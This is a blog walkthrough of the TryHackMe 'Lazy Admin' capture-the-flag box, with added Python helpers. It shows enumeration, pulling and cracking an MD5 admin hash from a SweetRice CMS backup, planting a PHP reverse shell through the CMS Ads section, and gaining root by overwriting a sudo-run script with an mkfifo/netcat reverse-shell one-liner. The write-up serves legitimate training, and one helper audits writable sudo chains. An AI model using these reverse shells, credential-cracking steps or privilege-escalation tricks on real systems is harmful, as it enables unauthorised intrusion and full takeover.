Tryhackme — Lazy Admin

Description: Easy Linux machine to practice your skills.

Just going through the original challenges I did when I started THM, each one bringing with it its own memories of "call this easy!!!" and "I'll never get the hang of this!!"

Either way, they did get easier and I did get the hang of them. So let’s make a start by enumerating as usual:


~ ping -c 4 $IP
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=63 time=17.0 ms
64 bytes from icmp_seq=2 ttl=63 time=16.9 ms
64 bytes from icmp_seq=3 ttl=63 time=16.9 ms
64 bytes from icmp_seq=4 ttl=63 time=16.7 ms
--- ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 16.659/16.881/17.013/0.133 ms


~ nmap -sV -sC -A $IP    
Starting Nmap 7.92 ( ) at 2022-09-12 10:52 BST
Nmap scan report for
Host is up (0.018s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 7.67 seconds


~ gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
2022/09/12 10:56:18 Starting gobuster in directory enumeration mode
/.htpasswd (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/content (Status: 301) [Size: 314] [-->]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 277]

2022/09/12 10:56:28 Finished


So the website on port 80 is just the stock Apache2 Ubuntu default page, which tells us nothing on its own:

However, with the gobuster scan indicating that a content folder exists, we can look at that:

gobuster 2 — the sequel

With the content folder found (and the page it serves identifying itself as a SweetRice CMS install), we can check for additional SweetRice directories.

~ gobuster dir -u http://$IP/content -w /usr/share/wordlists/dirb/common.txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
2022/09/12 11:00:56 Starting gobuster in directory enumeration mode
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/_themes (Status: 301) [Size: 322] [-->]
/as (Status: 301) [Size: 317] [-->]
/attachment (Status: 301) [Size: 325] [-->]
/images (Status: 301) [Size: 321] [-->]
/inc (Status: 301) [Size: 318] [-->]
/index.php (Status: 200) [Size: 2198]
/js (Status: 301) [Size: 317] [-->]

2022/09/12 11:01:04 Finished

This provides us with some additional threads to investigate. First we can check /content/as, which gives us a login screen.

Next, as part of the continued enumeration, we check /content/inc, which has directory listing enabled and so gives us a list of files:

One that stands out is the backup folder:

We download that and a quick search provides us with a username and hashed password:

cat mysql_bakup_20191129023059-1.5.1.sql | grep passw
14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"m******r\\";s:6:\\"passwd\\";s:32:\\"42f74************f475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');',

The hash is 32 hex characters, consistent with unsalted MD5, so putting it quickly through a hash lookup gets us the password.
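To make the credential-extraction step concrete, here is an added Python example (not code from the original post or from SweetRice) that does what the grep above does by hand: it undoes the PHP and MySQL quoting on one dump line, parses the serialized global_setting array to pull the admin and passwd fields, and runs a dictionary check of the 32-hex MD5. The dump line, the admin name exampleadmin and the hash (MD5 of "password") are constructed sample data, not the real values from the box.

```python
import hashlib
import re

# Constructed sample line in the shape of the mysql_bakup dump hit above.
# The admin name and hash are made up (hash is MD5 of "password"), not the box's real values.
SAMPLE_DUMP_LINE = (
    r"""14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:4:{"""
    r"""s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:5:\\"admin\\";s:12:\\"exampleadmin\\";"""
    r"""s:6:\\"passwd\\";s:32:\\"5f4dcc3b5aa765d61d8327deb882cf99\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');',"""
)


def php_single_quoted_unescape(s):
    """Undo PHP single-quoted-literal escaping: \\ -> \ and \' -> '."""
    return re.sub(r"\\([\\'])", r"\1", s)


def mysql_unescape(s):
    """Undo the backslash escaping MySQL applies inside a quoted string value."""
    return re.sub(r"\\([\\'\"])", r"\1", s)


def php_unserialize(data, pos=0):
    """Minimal PHP unserialize() for the types SweetRice's settings use: s, i, b, N and a.
    PHP string lengths are byte counts; this treats them as characters, fine for ASCII data."""
    t = data[pos]
    if t == "N":                                   # N;
        return None, pos + 2
    if t in "ib":                                  # i:123;  b:1;
        end = data.index(";", pos)
        raw = data[pos + 2:end]
        return (int(raw) if t == "i" else raw == "1"), end + 1
    if t == "s":                                   # s:LEN:"...";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                          # skip :"
        return data[start:start + length], start + length + 2
    if t == "a":                                   # a:COUNT:{key;value;...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        p = colon + 2                              # skip :{
        result = {}
        for _ in range(count):
            key, p = php_unserialize(data, p)
            value, p = php_unserialize(data, p)
            result[key] = value
        return result, p + 1                       # skip }
    raise ValueError(f"unsupported serialized type {t!r} at offset {pos}")


def extract_sweetrice_admin(dump_line):
    """Return (admin, passwd_hash) from one backup-dump line holding the global_setting row."""
    php_literal = dump_line.split("'", 1)[1].rsplit("'", 1)[0]
    sql = mysql_unescape(php_single_quoted_unescape(php_literal))
    m = re.search(r"'global_setting','(a:\d+:\{.*\})',", sql)
    if not m:
        raise ValueError("no global_setting row in this line")
    settings, _ = php_unserialize(m.group(1))
    return settings["admin"], settings["passwd"]


def crack_md5(md5_hex, candidates):
    """Plain dictionary attack: SweetRice stores the admin password as unsalted MD5."""
    target = md5_hex.lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


if __name__ == "__main__":
    user, pw_hash = extract_sweetrice_admin(SAMPLE_DUMP_LINE)
    print(f"admin={user} passwd_hash={pw_hash}")
    print("cracked:", crack_md5(pw_hash, ["123456", "letmein", "password"]))
```

The two unescape steps matter: the backup is a PHP file that wraps each SQL statement in a single-quoted literal, so the serialized blob is escaped twice before the `s:5:"admin"` fields become parseable.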

Using the credentials we gain access to the SweetRice admin panel. Luckily it shows us the current version, 1.5.1, so a quick searchsploit query gives us the following:

~ searchsploit sweetrice
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
SweetRice 0.5.3 - Remote File Inclusion | php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities | php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download | php/webapps/
SweetRice 1.5.1 - Arbitrary File Upload | php/webapps/
SweetRice 1.5.1 - Backup Disclosure | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution | php/webapps/40700.html
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload | php/webapps/14184.txt
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

So from this we can see that the backup disclosure (40718) is where we got the initial username and password. Another one, 40700 (CSRF / PHP code execution), looks as though it could give us a reverse shell. Checking it out, we find:

~ searchsploit -x php/webapps/40700.html
# Description :
# In SweetRice CMS Panel In Adding Ads Section SweetRice Allow To Admin Add
PHP Codes In Ads File
# A CSRF Vulnerabilty In Adding Ads Section Allow To Attacker To Execute
PHP Codes On Server

The CSRF part is irrelevant here, since we already hold admin credentials; what matters is that the Ads section writes whatever the admin types into a .php file under the web root. So clicking on Ads gives us the opportunity to add a PHP reverse shell.

Using pentestmonkey's php-reverse-shell.php and amending the file for our attacker box, we get:

set_time_limit (0);
$VERSION = "1.0";
$ip = ''; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;

Now give the ad a name and finalise it with a click on Done.

Remembering our second gobuster scan, we found the inc folder under content; the ads SweetRice creates are saved beneath it, and browsing there we can see our click_me.php file. Now, before we trigger it, a quick netcat listener on the port we selected, 4444.

nc -nlvp 4444      
Ncat: Version 7.92 ( )
Ncat: Listening on :::4444
Ncat: Listening on

And a quick curl request to that file should start the reverse shell.

There we have it: the initial foothold on the machine.

nc -nlvp 4444      
Ncat: Version 7.92 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
13:35:35 up 52 min, 0 users, load average: 0.00, 0.00, 0.00
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Making the shell interactive:

python -c 'import pty;pty.spawn("/bin/bash")' # then press Ctrl+Z
stty raw -echo;fg # then press ENTER twice
export TERM=xterm

Let’s find out who is on the machine, with a quick check of the home folder:

Further checks then provide us with the user flag.

Next, then: what can we actually do as the user www-data? A quick sudo -l gives us:

www-data@THM-Chal:/$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/

Checking out the file, we see from the ls -l that we did earlier that we can read and execute it but not write to it. However, it runs a further script:

-rw-r--r-x 1 root  root    47 Nov 29  2019 backup.pl
www-data@THM-Chal:/$ cat /home/itguy/
system("sh", "/etc/");

So now checking that file (copy.sh), it is world-writable (note the trailing rwx) and already contains a netcat reverse shell pointed at port 5554. Since sudo lets us run backup.pl as root without a password, and backup.pl in turn runs copy.sh as root, all we need to do is overwrite copy.sh with our own attacker box IP and port and we get a root shell.

www-data@THM-Chal:/$ ls -l /etc/ 
-rw-r--rwx 1 root root 81 Nov 29 2019 /etc/
www-data@THM-Chal:/$ cat /etc/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5554 >/tmp/f

In this case I used echo to get the data across, then set up a port 5555 netcat session and ran the file with my sudo credentials.

www-data@THM-Chal:/$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5555 >/tmp/f" > /etc/copy.sh
www-data@THM-Chal:/$ sudo /usr/bin/perl /home/itguy/

nc -nlvp 5555
Ncat: Version 7.92 ( )
Ncat: Listening on :::5555
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
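The root path above is worth generalising: a sudo rule that runs an interpreter on a fixed script is only as safe as every file that script goes on to execute, and here the sudo target was root-owned and read-only while the script it called was world-writable. Below is an added Python audit (not from the original post) that walks that chain: it stats the sudo target, pulls every quoted absolute path it references, and reports which of them the calling user could modify or replace, computing writability from the mode bits for a given uid/gid rather than via os.access() so it can answer for www-data from any account. The build_demo() fixture recreates the backup.pl -> copy.sh layout in a temp directory with constructed contents and the modes from the ls -l output; the listener address 10.0.0.1 in it is a placeholder.

```python
import os
import re
import shutil
import stat
import tempfile

# Quoted absolute paths, e.g. the "/etc/copy.sh" argument in system("sh", "/etc/copy.sh").
QUOTED_ABS_PATH = re.compile(r"""["'](/[^"'\s]+)["']""")


def writable_by(st, uid, gids):
    """Kernel-style DAC answer to 'can uid (member of gids) write this?' from a stat result.
    Only the first matching class (owner, then group, then other) counts, as in the kernel."""
    mode = st.st_mode
    if st.st_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def referenced_paths(script_text):
    """Absolute paths a script names in quotes: the candidates it may go on to execute or source."""
    return sorted(set(QUOTED_ABS_PATH.findall(script_text)))


def audit_sudo_script(script_path, uid, gids, seen=None):
    """Walk script_path and every quoted absolute path it references, recursively.
    Returns [(path, mode, reason)] for anything the given uid could modify or replace."""
    seen = set() if seen is None else seen
    findings = []
    if script_path in seen or not os.path.isfile(script_path):
        return findings
    seen.add(script_path)
    st = os.stat(script_path)
    if writable_by(st, uid, gids):
        findings.append((script_path, oct(st.st_mode & 0o777), "file writable"))
    parent = os.stat(os.path.dirname(script_path))
    if writable_by(parent, uid, gids):
        findings.append((script_path, oct(parent.st_mode & 0o777),
                         "parent directory writable, file can be replaced"))
    try:
        with open(script_path, errors="replace") as f:
            text = f.read()
    except OSError:
        return findings
    for child in referenced_paths(text):
        findings.extend(audit_sudo_script(child, uid, gids, seen))
    return findings


def build_demo(root):
    """Constructed replica of the chain on the box, with the modes from the ls -l output above."""
    copy_sh = os.path.join(root, "copy.sh")
    backup_pl = os.path.join(root, "backup.pl")
    with open(copy_sh, "w") as f:   # 10.0.0.1 is a placeholder listener, not the box's real value
        f.write("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 5554 >/tmp/f\n")
    os.chmod(copy_sh, 0o647)        # -rw-r--rwx: anyone can overwrite it
    with open(backup_pl, "w") as f:
        f.write(f'system("sh", "{copy_sh}");\n')
    os.chmod(backup_pl, 0o645)      # -rw-r--r-x: others may read and execute but not write
    return backup_pl


def run_demo(uid, gids):
    """Build the replica, audit it as the given user and return findings with paths shortened."""
    root = tempfile.mkdtemp()
    try:
        findings = audit_sudo_script(build_demo(root), uid, gids)
    finally:
        shutil.rmtree(root)
    return [(os.path.basename(p), mode, why) for p, mode, why in findings]


if __name__ == "__main__":
    # 33/33 is www-data on Ubuntu. The replica's files belong to whoever runs this, so they are
    # evaluated under the "other" bits and only copy.sh's o+w bit shows up, exactly as on the box.
    for item in run_demo(uid=33, gids=(33,)):
        print(item)
```

Run on a real host, point audit_sudo_script() at each script named in sudo -l with your own uid and groups; the parent-directory check catches the other common variant of this bug, where the script itself is read-only but sits in a directory the user can write to.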

A great little box, that I thoroughly enjoyed, but when I first started? Not so much. See how things change!!

James Pearson


20 + years in an IT environment, working for companies such as Synstar, HP, DXC and Capgemini in a number of different service areas. Now a cyber CTF addict.